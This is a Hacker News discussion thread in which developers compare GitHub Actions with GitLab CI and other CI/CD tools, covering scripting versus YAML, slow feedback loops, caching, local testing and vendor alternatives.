This so much. This ties into the previous point about using as much shell as possible. Additionally I'd say environment control via Docker/Nix, as well as modularizing the pipeline so you can restart it just before the point of failure instead of rerunning the whole business just to replay one little failure.
valenterry 7 days ago [-]
Amen.
To put the first 3 points into different words: you should treat the CI only as a tool that manages the interface and provides interaction with the outside world (including injecting secrets/configuration, setting triggers, storing caches etc.) and helps to visualize things.
Unfortunately, to do that, it puts constraints on how you can use it. Apart from that, no logic should live in the CI.
Tainnor 7 days ago [-]
> Write as much CI logic as possible in your own code. Does not really matter what you use (shell scripts, make, just, doit, mage, whatever) as long as it is proper, maintainable code.
To an extent, yes. There should be one command to build, one to run tests, etc.
But in many cases, you do actually want the pipeline functionality that something like Gitlab CI offers - having multiple jobs instead of a single one has many benefits (better/shorter retry behaviour, parallelisation, manual triggers, caching, reacting to specific repository hooks, running subsets of tests depending on the changed files, secrets in env vars, artifact publishing, etc.). It's at this point that it becomes almost unavoidable to use many of the configuration features including branching statements, job dependencies etc. and that's where it gets messy.
The problem is really that you're forced to do all of that in YAML instead of an actual programming language.
jordanbeiber 7 days ago [-]
We’ve gone full-on full-code.
Although we’re using temporal to schedule the workflows, we have a full-code typescript CI/CD setup.
We’ve been through them all starting with Jenkins ending with drone, until we realized that full-code makes it so much easier to maintain and share the work over the whole dev org.
No more yaml, code generating yaml, product quirk, groovy or DSLs!
bob1029 7 days ago [-]
> Write as much CI logic as possible in your own code
This has been my entire strategy since I've been able to do this:
Pulling the latest from git, running "dotnet build" and sending the artifacts to zip/S3 is now much easier than setting up and managing Jenkins, et. al. You also get the benefit of having 100% of your CI/CD pipeline under source control alongside the product.
In my last professional application of this (B2B/SaaS; customer hosts on-prem), we didn't even have to write the deployment piece. All we needed to do was email the S3 zip link to the customer and they learned a quick procedure to extract it on the server each time.
ptx 7 days ago [-]
> All we needed to do was email the S3 zip link to the customer and they learned a quick procedure to extract it on the server each time.
My concern with this kind of deployment solution, where the customer is instructed to install software from links received in e-mails, is that someone else could very easily send them a link to a malicious installer and they would be hosed. E-mail is not authenticated (usually) and the sender can be forged.
I suppose you could use a shared OneDrive folder or something, which would be safer, as long as the customer doesn't rely on receiving the link to OneDrive by e-mail.
wvh 6 days ago [-]
I like the premise of something like Dagger, being an Actions CI that can run locally and uses Docker. I don't know if there's an up-and-coming "safe" open-source alternative that does not have that threat of a VC time bomb hanging over it.
Docker and to some extent, however unwieldy, Kubernetes at least allow you to run anywhere, anytime without locking you into a third party.
A "pipeline language" that can run anywhere, even locally, sets up dependency services and initial data, runs tests and avoids YAML overload would be a much needed addition to software engineering.
6 days ago [-]
cesnja 7 days ago [-]
You can build the first pipeline with oneliners, but as long as you want to keep optimizing the pipelines, the yaml code will keep piling up with CI vendor's specific approaches to job selection, env variable delivery, caching, output sharing between jobs and so on.
DanielHB 7 days ago [-]
Man I tried this approach by making my builds dockerized, turns out docker layer caching is pretty slow on CI and adds a lot of overhead locally.
Do not recommend this approach (of using docker for building).
adra 7 days ago [-]
Make builds in docker by mounting volumes and have your sources, intermediate files, caches, etc. in these volume mounts. Building a bunch of intermediate or incremental data IN the container every time you execute a new partial compile is insanity.
It's very satisfying just compile an application with a super esoteric tool chain in docker vs the nightmares of setting it up locally (and keeping it working over time).
DanielHB 7 days ago [-]
I had a project that had to build for macos, linux and windows on armv7, armv8 and x64 (and there were some talks about mips too). Just setting up all the stuff required to compile for all these target archs was a nightmare.
We used a single huge docker image with all the dependencies we needed to cross compile to all architectures. The image was around 1GB, it did its job but it was super slow on CI to pull it.
amadio 7 days ago [-]
I think this is good advice overall. I wrote a CMake script that does most of the heavy lifting for XRootD (see https://news.ycombinator.com/item?id=39657703). The CI is then a couple of lines, one to install the dependencies using the packaging tools, and another one calling that script. So don't underestimate the convenience that packaging can give you when installing dependencies.
Aeolun 7 days ago [-]
This is where I was going to say something about dagger, but it seems it turned into AI crud.
Let me at least recommend depot.dev for having absurdly fast runners.
shykes 7 days ago [-]
Hello! Dagger CEO here. We are indeed getting an influx of AI workloads (AI agents to be specific, which is the fancy industry term for "software with LLMs inside"), and are of course trying to capitalize on that in our marketing material. We're still looking for the right balance of CI and AI on our website. Crucially, it's the same engine running both. Because, as it turns out, AI agents are mostly workflows under the hood, and Dagger is great at running those.
can you give more feedback about dagger? what is good/not good about it? I was going to start looking into it
Aeolun 7 days ago [-]
I liked their setup before, though I never got around to actually using it, but the tagline on the website has changed to “AI powered workflow orchestration”, which is quite different from the original “Write pipeline once, run everywhere”
oulipo 6 days ago [-]
yes but I went on their Discord, and the AI thing is more an "extension" of the CI/CD thing, it's just marketing-speak for the investors, they are still building the CI/CD tool
toastal 7 days ago [-]
For starts looking at their website, it looks like all collaboration is locked behind proprietary platforms… Discord, Twitter, LinkedIn, Microsoft GitHub.
* Consider whether it's not easier to do away with CI in the cloud and just build locally on the dev's laptop
With fast laptops and Docker you can get perfectly reproducible builds and tests locally that are infinitely easier to debug. It works for us.
claytonjy 7 days ago [-]
How do you ensure what a dev builds and tags and pushes is coherent, meaning the tag matches the code commit it’s expected to?
I think builds must be possible locally, but i’d never rely on devs for the source of truth artifacts running in production, past a super early startup.
speleding 6 days ago [-]
You can add all kind of verification scripts to git hooks, that trigger before and after someone pushes, like you do with GitHub actions. Whether you trust you devs less than your build pipeline is an organizational issue, but in our org only a few senior devs can merge to master.
7 days ago [-]
ed_elliott_asc 7 days ago [-]
* print out the working directory and a directory listing every time
12_throw_away 7 days ago [-]
And the environment! (Also, don't put secrets in environment vars)
WhyNotHugo 7 days ago [-]
If CI just installs some packages and runs `make check` (or something close), then it's going to be much much easier for others to run checks locally.
djha-skin 7 days ago [-]
I couldn't agree more, really. My whole career points to this as the absolute correct advice in CI.
fahhem 7 days ago [-]
Why use your own runners? If it's about cost, why not use a cheaper cloud like SonicInfra.com?
outofpaper 7 days ago [-]
Agree with everything except for the avoidance of YAML. What is your rationale for this?
neves 7 days ago [-]
How AWS Code Builder compares? I'm delving into AWS world now.
Kwpolska 7 days ago [-]
There are tradeoffs to that. If your CI logic is in shell scripts, you will probably get worse error reporting than the dedicated tasks from the CI tool (which hook into the build system, or which know how to parse logs).
agumonkey 7 days ago [-]
seconded, it was great to leverage hosted cicd at work, until we realized that local testing would now be handled differently..
as always, enough decoupling is useful
totaldude87 7 days ago [-]
Gitlab's search just sucks..
julik 6 days ago [-]
Seconded. Moreover...
> as long as it is proper, maintainable code
...in an imperative language you know well and which has a sufficient amount of type/null checking you can tolerate.
Ancalagon 7 days ago [-]
+1 for avoiding YAML at all costs
Also lol @deng
okayishdefaults 7 days ago [-]
[dead]
tobinfekkes 7 days ago [-]
This is the joy of HN, for me, at least. I'm genuinely fascinated to read that both GitHub Actions and DevOps are (apparently) so universally hated. I've been using both for many years, with barely a hiccup, and I actually really enjoy and value what they do. It would never have dawned on me, outside this thread, to think that so many people dislike it. Nice to see a different perspective!
Are the Actions a little cumbersome to set up and test? Sure. Is it a little annoying to have to make somewhat-useless commits just to re-trigger an Action to see if it works? Absolutely. But once it works, I just set it and forget it. I've barely touched my workflows in ~4 years, outside of the Node version updates.
Otherwise, I'm very pleased with both. My needs must just be simple enough to not run into these more complicated issues, I guess?
dathinab 7 days ago [-]
It really depends on what you do?
GitHub CI is designed in a way which tends to work well for
- languages with no or very very cheap "compilation" steps (i.e. basically only scripting languages)
- relatively well contained project (e.g. one JS library, no mono repo stuff)
- no complex needs for integration tests
- no need for compliance enforcement stuff, especially not if it has to actually be securely enforced instead of just making it easier to comply then not to comply
- all developers having roughly the same permissions (ignore that some admin has more)
- fast CI
but the moment you step away from this it just falls more and more and more apart and I every company which doesn't fit the constraints above I have seen so far has non stop issues with GitHub Actions.
But the worst part, which maybe is where a lot of hatred comes from, is that it's there for cheap maybe even free (if you anyway pay for GitHub) and it doesn't need an additional contract, billing, etc. Not an additional vetting of 3rd party companies. Doesn't need managing your own CI service etc. So while it does cause issues non stop it also seems initially still "cheaper" solution for the company. And then when your company realizes it's not and has to setup their own GitHub runner etc. it probably isn't. But that is if you properly account dev time spend on "fixing CI issues" and even then there is the sunk cost fallacy because you already spend so much time to make github actions work and you would have to port everything over etc. Also, realistically speaking, a lot of other CI solutions are only marginally better.
voxic11 7 days ago [-]
> no need for compliance enforcement stuff
I find github actions works very well for compliance. The ability to create attestations makes it easy to enforce policies about artifact provenance and integrity and was much easier to get working properly compared to my experience attempting to get jenkins to produce attestations.
They also work very well to leak all your secrets and infect people who download your software from pypi :D
tasuki 7 days ago [-]
> languages with no or very very cheap "compilation" steps (i.e. basically only scripting languages)
This is not true at all. It's fine with Haskell, just cache the dependencies to speed up the build...
dathinab 7 days ago [-]
except that
- GitHub Action cache and build artifact handling is a complete shit show (slow upload, slow download and a lot of practical subtle annoyances, finished off with sub-par integration in existing build systems)
- GitHub runners are comparatively small, so e.g. larger linker steps can already lead to pretty bad performance penalties
and sure like I said, if you project is small it doesn't matter
folmar 7 days ago [-]
I see the slow cache problem as universal. On a single-machine gitlab runner instance the upload to _local_ cache seems to take ages, double digit number of seconds for 100 MB archive.
mystified5016 3 days ago [-]
GitLab drives me insane with this. My runner is on a 5 year old alienware desktop with an nvme ssd and all the trimmings but loading an uncompressed cache from the same local disk takes ten goddamn minutes. No matter what, all of my jobs take five to ten minutes just to start up.
ch4s3 6 days ago [-]
The caching is atrocious and seems to not correctly restore our cache randomly in parallel jobs in the same run. It’s the worst CI that I’ve ever used.
Marsymars 7 days ago [-]
> But the worst part, which maybe is where a lot of hatred comes from, is that it's there for cheap maybe even free (if you anyway pay for GitHub) and it doesn't need an additional contract, billing, etc.
Or even if you pay $$$ for big runners you can roll it onto your Azure bill rather than having to justify another SAAS service.
lolinder 7 days ago [-]
> Also, realistically speaking, a lot of other CI solutions are only marginally better.
This is the key point. Every CI system falls apart when you get too far from the happy path that you lay out above. I don't know if there's an answer besides giving up on CI all together.
jillesvangurp 7 days ago [-]
I use GH actions. You should treat it like all build systems: let them do what they are good at and nothing else. The rest should be shell scripts or separate docker containers. If it gets complicated, dumb it down to "run this script". Scripts are a lot easier to write and debug than thousands of lines of yaml doing god knows what.
The problem isn't github actions but people overloading their build and CI system with all sorts of custom crap. You'd have a hard time doing the same thing twenty years ago with Ant and Hudson (Jenkin's before the fork after Oracle inherited that from Sun). And for the same reason. These systems simply aren't very good as a bash replacement.
If you don't know what Ant is. That was a popular build system for Java before people moved the problem to Maven and then to Gradle (without solving it). I've dealt with Maven files that were trying to do all sorts of complicated things via plugins that would have amounted to two or three lines of bash. Gradle isn't any better. Ant at least used to have simple primitives for "doing" things. But you had to spell it out in XML form.
The point of all this, is that build & CI systems should mainly do simple things like building software. They shouldn't have a lot of conditional logic, custom side effects, and wonky things that may or may not happen depending on the alignment of the moon and stars. Debugging that stuff when it fails to work really sucks.
What helps with Yaml is using Yaml generators. I've used a Kotlin one for a while. Basically, you get auto complete, syntactical sanity, type checking and if it compiles it runs. Also makes it a lot easier to discover new parameters, plugin version updates, etc.
motorest 7 days ago [-]
> I use GH actions. You should treat it like all build systems: let them do what they are good at and nothing else. The rest should be shell scripts or separate docker containers.
That's supposedly CICD 101. I don't understand why people in this thread seem to be missing this basic fact and instead they vent about irrelevant things like YAML.
You set your pipeline. You provide your own scripts. If a GitHub Action saves you time, you adopt it instead of reinventing the wheel. That's it.
This whole discussion reads like the bike fall meme.
int_19h 6 days ago [-]
If the sole purpose of GitHub Actions is to run a few shell scripts in order, why does it have expression evaluation, conditions, and dozens of stock actions other than `run`?
michaelmior 6 days ago [-]
I thin one big benefit of being able to do this is getting more visibility into the pipeline from the GitHub Actions UI/API (including status checks in PR builds). It also helps with reusability. If something is packaged as a GitHub Action, it's much easier to reuse than a shell script written for some other project. GitHub Actions is far from perfect, but I think once you get used to it, it works pretty well.
motorest 6 days ago [-]
> If the sole purpose of GitHub Actions is to run a few shell scripts in order, why does it have expression evaluation, conditions, and dozens of stock actions other than `run`?
For you to make that comment, I'm not sure you ever went through any basic intro to GitHub Actions tutorial.
Now that we established that, GitHub Actions also supports custom actions, which is a way to create, share, and reuse high-level actions. Instead of copy-pasting stuff around, you do the equivalent of importing a third party module.
Onboarding a custom GitHub Action does not prevent you from using steps.run.
I don't even know where to start regarding your comment on expression evaluation and conditions. Have you used a CICD system before?
The problem with half the comments in this thread railing against CICD in general, YAML, etc is that they clearly do not have a faintest idea about what they are doing, and are instead complaining about ther own inability.
pepoluan 7 days ago [-]
People hates YAML because doing so makes them look cool and trendy. Just like Python-hating. Even if their 'hate' is misdirected.
I'm an experienced SaltStack user. If I found something I need is too complex to be described in YAML, I'll just write a custom module and/or state. Use YAML just to inform Salt what should happen, and shove the logic in the Python files.
People really should become generalists if they handle the plumbing.
anonzzzies 7 days ago [-]
We see quite a lot of organisations inside because of the business we have, and, while usually this is not our task, when I hear these stories and see people struggle with devops stuff in reality, the first thing we push for is to do anything to dumb it down and remove all the dependencies on 3rd party providers so we are back to having everything run again like, in this case, the hello world of github actions. It is literally always the case that the people who complain have this (very HN, so funny you say that) thing of absolutely grossly overarchitecting and writing things that are just there because they read it on HN/some subreddits/discord. We sometimes walk into struggling teams where we check the commits / setup only to find out they did things like switch package manager/bundler/etc 5x in the past year (this is definitely a HN thing where a new packagemanager for js pops up every 14 minutes). Another terrible thing looking at 10+ year codebases, we see js, ts, py, go, rust and when we ask wtf, they tell us something something performance. Of course the language was never the bottleneck of these (people here would be pretty scared to see how bad database setups are even for multi million$ projects in departmental or even enterprise wide; the DBA's in the basement know but they are not consulted for various reasons), mostly LoB, apps. And the same happens with devops. We only work for large companies, almost never startups, and these issues are usually departmental (because big bad Java/Oracle IT in the basement doesn't allow anything so they have budgets to do their own), but still, it's scary how much money is being burnt on these lame new things that won't survive anyway.
IshKebab 7 days ago [-]
Sounds like you have the same pain points as everyone else; you're just more willing to ignore them.
I am with the author - we can do better than the status quo!
tobinfekkes 7 days ago [-]
I guess it's possible. But I also don't really have anything to ignore....? I genuinely never have an issue; it builds code, every time.
I commit code, push it, wait 45 seconds, it syncs to AWS, then all my sites periodically ping the S3 bucket for any changes, and download any new items. It's one of the most reliable pieces of my entire stack. It's comically consistent, compared to anything I try building for a mobile app or pushing to a mobile app store.
I look forward to opening my IDE to push code to the Actions for my web app, and I dread the build pipeline for a mobile app.
IshKebab 7 days ago [-]
> I genuinely never have an issue; it builds code, every time.
Well yeah because nobody is saying it isn't reliable. It's the setup stage that is painful. Once you've done it you can just leave it mostly.
I guess if your CI is very simple and always the same you are exposed to these issues less.
michaelmior 6 days ago [-]
> I dread the build pipeline for a mobile app.
I would recommend looking at Fastlane[0] if you haven't already.
You notice a deprecation warning in the logs, or an email from GitHub and you make a 1 line commit to bump the node version. Easy.
Sure you can make typos that you don’t spot until you’ve pushed and the action doesn’t run, but I quickly learned to stop being lazy and actually think about what I’m writing, and get someone else to do an actual review (not just scroll down and up and give it a LGTM).
My experience is same as the commenter above, it’s relatively set and forget. A few minutes setup work for hours and hours of benefit over years of builds.
ironmagma 7 days ago [-]
The non-solution solution, to simply downplay the issues instead of fixing them. You can solve almost anything this way, but also isn't it nice when things around you aren't universally slightly broken?
dkdbejwi383 7 days ago [-]
I guess I'd disagree that this is "slightly broken". That's just how it works. I don't think there's some universally perfect solution that magically just works all the time and never needs intervention or updating.
IshKebab 7 days ago [-]
> That's just how it works.
It's how it works now. It doesn't have to forever. We can imagine a future in which it works in a better way. One that isn't so annoying.
> I don't think there's some universally perfect solution that magically just works all the time and never needs intervention or updating.
Again you seem to be confused as to what the issue is. Maintenance is not painful. Initial development is.
raffraffraff 7 days ago [-]
It probably depends on your org size and how specialised you are. Right now I dislike GitHub Actions and think that Gitlab CI is way better, but I also don't give it to much thought because it's a once in a blue moon task for me to mess with them. But I would absolutely hate to be a "100% DevOps guy" for a huge organisation that wants me to specialise in this stuff all the time. I think that by the end of week 1 I'd go mad.
Marsymars 7 days ago [-]
I don't mind it per se; to me the problem is then that some devs don't bother with basic debugging steps of CI failures - if anything works locally and fails in CI, their first step is to message me - so instead of being "100% DevOps" I spend a pile of time debugging other devs' local environments.
sgarland 7 days ago [-]
My favorite is when they post an absolutely massive error message, most of which is utterly unrelated, but also the answer to their problem is contained within it.
thom 7 days ago [-]
Unless I'm misunderstanding, you can use workflow_dispatch to avoid having to make useless commits to trigger actions.
duped 7 days ago [-]
I have a small gripe that I think exemplifies a bigger problem. actions/upload-artifact strips executable permissions from binaries (1). The fact they fucked this up in the first place, and six years later haven't fixed it, gives me zero confidence in the team managing their platform. And when I'm picking a CI/CD service, I want reliability and correctness. GH has neither.
When it takes all of a day to self host your own task runner on a laptop in your office and have better uptime, lower cost, better performance, and more correct implementations, you have to ask why anyone chooses GHA. I guess the hello-world is convincing enough for some people.
You must have simple, straightforward flow touched only by a handful of folks max.
The world is full of kafkaesque nightmares of Dev-ops pipeline "designed" and maintained by committees of people.
It's horrible.
That said, for some personal stuff I have Google Cloud Build that has a very VERY simple flow. Fire, forget and It's been good.
eru 6 days ago [-]
You might like 'git commit --allow-empty' to make your somewhat-useless commits.
But honestly, doesn't github now have a button you can press to retrigger actions without a commit?
GitHub Actions are least hassle, when you don't care about how much compute time you are burning through. Either because you are using the free-for-open-source repositories version, or because your company doesn't care about the cost.
If you care about the compute time you are burning, then you can configure them enough to help with that, but it quickly becomes a major hassle.
ImHereToVote 7 days ago [-]
GitHub actions is nice. People are just not accustomed to being punched in the face. The stuff I work on regularly makes GitHub actions seem like a Hello World app.
trevor-e 7 days ago [-]
I thought the same until having to do slightly more complicated and "off the beaten path" workflows. I'm still amazed at how easy they make building CI jobs now, but I also get frustrated at how it's not a "local first" workflow that you then push to their service.
tasuki 7 days ago [-]
Yes, your needs are simple. I've also been using GitHub actions for all my needs since Travis shut down and haven't run into any problems.
I wouldn't want to maintain GitHub actions for a large project involving 50 people and 5 languages...
flanked-evergl 7 days ago [-]
Software engineer thrives on iteration speed. Things have to change, if your pipeline is difficult to change it will cost you.
motorest 7 days ago [-]
[dead]
xlii 7 days ago [-]
There is one thing that I haven’t seen mentioned: worst possible feedback loop.
I’ve noticed this phenomenon few times already, and I think there’s nothing worse than having a 30-60s feedback loop. The one that keeps you glued to the screen but otherwise is completely nonproductive.
I tried for many moons to replicate GHA environment on local and it’s impossible in my context. So every change is like „push, wait for GH to pickup, act on some stupid typo or inconsistency, rinse, repeat”.
It’s like a slot machine „just one more time and it will run”, eating away focus and time.
It took me 25 minutes to get 5s build process. Naive build with GHA? 3 minutes, because dependencies et al. Ok, let’s add caching. 10 hours fly by.
The cost of failure and focus drop is enormous.
kelseydh 7 days ago [-]
Feel this pain so much. If you are debugging Github Action container builds, and each takes over ~40 minutes to build.. you can burn through a whole work day only testing six or seven changes.
There has to be a better way. How has nobody figured this out?
elAhmo 7 days ago [-]
There is act, that allows you to run actions locally. Although not exactly the same as the real thing, it can save time.
In organization setting this is almost useless if you are (or forced to) use some pre-made actions and/or actions that are for your organization only (they cannot be downloaded) also useless if you are forced to use self hosted runner with image that you don't have access to. Not to mention env/secrets and networking...
terminalbraid 7 days ago [-]
This is a great tool, but I always cringe when something so important comes from a third party
7 days ago [-]
cantagi 7 days ago [-]
act is brilliant - it really helps iterate on github or gitea actions locally.
esafak 7 days ago [-]
There's dagger; CI as code. Test your pipeline locally, in your IDE.
I wish GitLab/GitHub would provide a way to do this by default, though.
cantagi 7 days ago [-]
act is great. I use it to iterate on actions locally (I self-host gitea actions, which uses act, so it's identical to github actions).
lsuresh 7 days ago [-]
This is exactly a big piece of our frustration -- the terrible feedback loop and how much mental space it wastes. OP does talk about this at the end (babysitting the endless "wip" commits till something works).
figmert 7 days ago [-]
Highly recommend nektos/act, and if it's something complex enough, you can Ssh into the server to investigate. There are many action that facilitate this.
tomjakubowski 5 days ago [-]
I use LLMs for a lot of things these days, but maybe the most important one is as a focus-preserving mechanism for exactly these kinds of middle-ground async tasks that have a feedback loop measured in a handful of minutes.
If the process is longer than a few minutes, I can switch tasks while I wait for it. It's waiting for those things in the 3-10 minute range that is intolerable for me: long enough I will lose focus, not long enough for me to context switch.
Now I can bullshit with the LLM about something related to the task while I wait, which helps me to stay focused on it.
silisili 7 days ago [-]
I worked at companies using Gitlab for a decade, and got familiar with runners.
Recently switched to a company using Github, and assumed I'd be blown away by their offering because of their size.
Well, I was, but not in the way I'd hoped. They're absolutely awful in comparison, and I'm beyond confused how it got to that state.
If I were running a company and had to choose between the two, I'd pick Gitlab every time just because of Github actions.
yoyohello13 7 days ago [-]
Glad I’m not the only one. GitLab runners just make sense to me. A container you run scripts in.
I have some GitHub actions for some side projects and it just seems so much more confusing to setup for some reason.
briansmith 7 days ago [-]
Actions have special integration with GitHub (e.g. they can annotate the pull request review UI) using an API. If you forgo that integration, then you can absolutely use GitHub Actions like "a container you run scripts in." This is the advice that is usually given in every thread about GitHub Actions.
byroot 7 days ago [-]
That helps a bit but doesn't solve everything.
If you want to make a CI performant, you'll need to use some of its features like caches, parallel workers, etc. And GHA usability really fall short there.
The only reason I put up with it is that it's free for open source projects and integrated in GitHub, so it took over Travis-ci a few years ago.
mubou 7 days ago [-]
Devil's advocate: They could make the github CLI capable of doing all of those things (if it's not already), and then the only thing the container needs is a token.
pinkgolem 7 days ago [-]
There are multiple ways you can do this already from within a script
baq 7 days ago [-]
Ah, the Dropbox comment.
> For a Linux user, you can already build such a system yourself quite trivially by getting an FTP account, mounting it locally with curlftpfs, and then using SVN or CVS on the mounted filesystem. From Windows or Mac, this FTP account could be accessed through built-in software.
i just told the op that there are multiple ways to archive that without using api keys when in a script.
one of them beeing echoing text to a file. to me, your comparison makes no sense.
HdS84 7 days ago [-]
There are lots of problems.
Actions try to abstract the script away and give you a consistent experience and, must crucially, allow sharing. Because gitlab has no real way to share actions or workflows (I can do yaml include, but come on that sucks even harder than actions) you are constantly reinventing the wheel.
That's ok if all you do is " build folder" but if you need caching, reporting of issues, code coverage etc. Pp it gets real ugly really fast.
Example: yesterday I tried services, i.e. starting up some DB and backend containers to run integration tests against. Unfortunately, you cannot expand dynamic variables (set by previous containers) but are limited to already set bars. So back to docker compose...and the gitlab pipelines are chock full of such weird limitations
kroolik 7 days ago [-]
You can apply dynamic env to other jobs by exporting an env file as a dotenv artifact. So first job creates a dotenv file and export it as artifact. Second depends on the first so it can consume the artifact. https://docs.gitlab.com/ci/yaml/artifacts_reports/#artifacts...
HdS84 7 days ago [-]
Yes, that works for most thinks. E.g. for services:name, but not services:variables:xxx
raffraffraff 7 days ago [-]
I haven't looked too much into how sharing workflows works, but isn't the use of shared GitHub workflows (from outside your org) a little dangerous? I get it, we use other people's code all the time. Some we trust more (ISO of a Linux OS with SHA) and others we trust a little less even if it comes from a verified source with GPG, because we know that supply chain attacks can happen.
Every time someone introduced a new way to use someone else's shared magic I feel nervous about using it. Like GitHub Actions. Perhaps it's time for me to dig into them a bit more and try to understand if/how they're safe to use. But I seem to remember just a few days ago someone mentioning a GitHub action getting hijacked?
I will be stunned if this doesn't become a more popular attack vector over the next few years. Lots of valuable stuff sits in github, and they're a nearly-wide-open hole to access it.
vel0city 7 days ago [-]
Definitely a mixed bag. Lots of community derived actions which yes, potentially have some bad supply chain questions. I tend to try and avoid these as much as possible. Lots of established vendors also have their own actions shared though, so you don't have to reinvent the wheel when interacting with their platforms/services/products.
For instance, AWS has a lot of actions they maintain to assist with common CI/CD needs with AWS services.
So Github was really the perfect acquisation for the Microsoft portfolio. Applications with a big market share that are technically inferior to the competition.
// Luckily still a gitlab user, but recently forced to Microsoft Teams and office.
out-of-ideas 7 days ago [-]
> recently forced to Microsoft Teams
my condolences to you and your team for that switch; it's my 2nd used-and-disliked thing (right next to atlassian) - oh well
but one cool feature i found with ms teams that zoom did not have (some years ago - no clue now) is turning off incoming video so you dont have to be constantly distracted in meetings
edit:
oh yeah, re github actions and the user that said:
> Glad I’m not the only one
me too, me too; gh actions seem frustrating (from a user hardly using gh actions, and more gitlab things - even though gitlab seems pretty wonky at times, too)
jcattle 7 days ago [-]
I prefer teams just for the fact that by default everyone can mute everyone else in the call. It just gives me peace of mind that if I ever leave my mic on by mistake, someone in the call would have my back and just mute me.
folmar 7 days ago [-]
Pretty much any major teleconference software does that for a few years already.
rhubarbtree 7 days ago [-]
Technical superiority is so irrelevant compared to distribution. Welcome to capitalism, where the market rewards marketing.
OJFord 6 days ago [-]
> I have some GitHub actions for some side projects and it just seems so much more confusing to setup for some reason.
Because the docs are crap perhaps? I prefer it, having used both professionally (and Jenkins, Circle, Travis), but I do think the docs are really bad. Even just the nesting of pages once you have them open, where is the bit with the actual bloody syntax reference, functions, context, etc.
globular-toast 7 days ago [-]
Same. I'd been using Gitlab for a few years when Actions came out. Looked at it and thought, wow that's weird, but gave it the benefit of the doubt as it's just different, surely it would make sense eventually. Well no, it doesn't make sense, and seeing all the shocked Pikachu at the action compromise the other day was amusing.
zamalek 7 days ago [-]
> I'm beyond confused how it got to that state.
A few years back I wanted to throw in the towel and write a more minimal GHA-compatible agent. I couldn't even find where in the code they were calling out to GitHub APIs (one goal was to have that first party progress UI experience). I don't know where I heard this, so big hearsay warning, but apparently nobody at GitHub can figure it out either.
jalaziz 7 days ago [-]
GitHub Actions started off great as they were quickly iterating, but it very much seems that GitHub has taken its eye of the ball and the improvements have all but halted.
Sad to see Earthly halting development and Dagger jumping on the AI train :(. Hopefully we'll get a proper alternative.
On a related note, if you're considering https://www.blacksmith.sh/, you really should consider https://depot.dev/. We evaluated both but went with Depot because the team is insanely smart and they've solved some pretty neat challenges. One of the cooler features is that their caching works with the default actions/cache action. There's absolutely no need to switch out popular third party actions in favor of patched ones.
shykes 7 days ago [-]
> Sad to see Earthly halting development and Dagger jumping on the AI train :(. Hopefully we'll get a proper alternative.
Hi, Dagger CEO here. We're advertising a new use case for Dagger (running AI agents) while continuing to support the original use case (running complex builds and tests). Dagger has always been a general purpose engine, and our community has always used it for more than just CI. It's still the exact same engine, CLI, SDKs and observability stack. It's not like we're discontinuing a product, to the contrary: we're getting more workloads on the platform, which benefits all our users.
jalaziz 7 days ago [-]
Great to know. I think the fear is that so many companies are prioritizing AI workloads for the valuation bump rather than delivering actual meaningful value.
shykes 7 days ago [-]
I completely understand that fear. I see lots of other tech companies making that mistake, throwing away a perfectly good product and market out of pure "FOMO". I really, really don't want us to be one of those companies.
I think what we're doing is different: we built a product that was always meant to be general purpose; encouraged our community to experiment with alternative use cases; and are now doubling down on a new use case, for the same product. We are still worried about the perception of a FOMO-driven AI pivot (and the reactions on this thread confirm that we still have work to do there); but we're confident that the product really is capable of supporting both.
Thank you for the thoughtful comments, I appreciate it.
SamuelAdams 7 days ago [-]
A lot of GH actions teams were impacted by layoffs in November.
Presumably the issue is that GH underpriced Actions such that it's not worth improving because driving more usage won't drive revenue, and that then forced prices down for everyone else because everyone fixed on the Actions pricing.
pinkgolem 7 days ago [-]
I might have missed the news, but I did not find anything in regards to earthly stopping development
Sigh, this is awful. Earthly is/was not perfect, but is basically the most capable build tool I've ever used. Fingers crossed there's enough enthusiasm in the community to fork it (I'd be organizing it myself if I had any experience with Go at all)
pimeys 7 days ago [-]
We switched to Depot last week. Our Rust builds went down from 20+ minutes to 4-8 minutes. The easy setup and their docker builds with fast caching are really good.
lsuresh 7 days ago [-]
This sounds promising. What made your Rust builds become that fast? Any repo you could point us to?
What makes Depot so fast is that they use NVMe drives for local caching and they guarantee that the cache will always be available for the same builders. So you don't suffer from the cold-start problem or having to load your cache from slow object storage.
lsuresh 7 days ago [-]
Thanks! We already use self-hosted runners on physical machines with NVMe drives that we assembled ourselves. I was wondering if there's something else you're doing for the caching.
kylegalbraith 6 days ago [-]
Founder of Depot here. For image builds, we’ve done quite a bit of optimization to BuildKit for our image builders to make certain aspects of the builds fast like load, cache invalidations, etc.
We also do native multi-platform builds behind one build command. So you can call depot build —platform Linux/amd64,linux/arm64 and we will build on native Intel and ARM CPUs and skip all the emulation stuff. All of that adds up to really fast image builds.
Hopefully that’s helpful!
suryao 7 days ago [-]
If you're building rust containers, we have the world's fastest remote container builders with automated caching.
You wouldn't really have to change anything on your dockerfile to leverage this and see significant speed up.
> Trivial mistakes (formatting, unused deps, lint issues) should be fixed automatically, not cause failures.
Do people really consider this best practice? I disagree. I absolutely don't want CI touching my code. I don't want to have to remember to rebase on top of whatever CI may or may not have done to my code. Not all linters are auto-fixable so anyway some of the time I would need to fix it from my laptop. If it's a trivial check it should run as a pre-commit hook anyway. What's next, CI should run an LLM to auto-fix failing test cases?
Do people actually prefer CI auto-fixing anything?
thedougd 7 days ago [-]
I think this is where things went off the rails for him. Commiting back to the same branch that is running CI has too many gotchas in any CI system. You touched on the first issue, the remote branch immediately deviates unexpectedly from the local branch. Care has to be taken not to trigger additional CI runs from that commit.
stared 7 days ago [-]
I do such things with pre-commit.
Doing it in CI sounds like making things more complicated by resetting to remote branches after pushing commits. And, in the worst case, something that actually brakes code that works locally.
Marsymars 7 days ago [-]
I have team members who complain that installing and running pre-commit is too much overhead, so instead I see them pushing commit after broken commit that tie up CI resources to fail on the pre-commit workflow. :(
michpoch 7 days ago [-]
> I have team members who complain that installing and running pre-commit is too much overhead
Why do they have a say in this? This is up to tech leadership to set standards that need to be followed.
anbotero 6 days ago [-]
I’ve had people like this. I’m with the other commenter that: Why do they have a say in this? No way I’m letting them decide each day when to format, what style to format to... Meet, discuss, pick a style, enforce formatting, screw you if you don’t follow.
I’m also with the other commenter about settings these things at the Editor level, but also at the pre-push level.
We benchmark how long it takes to format/lint only changed files, usually no more than a second, maybe two, but I admit for some languages this may take more. An editor with a language server properly setup would have helped you find issues earlier.
We also have reports for our CI pipeline linters, so if we see more than 1 report there, we sent a message to the team: It means someone didn’t setup their editors nor their git hooks.
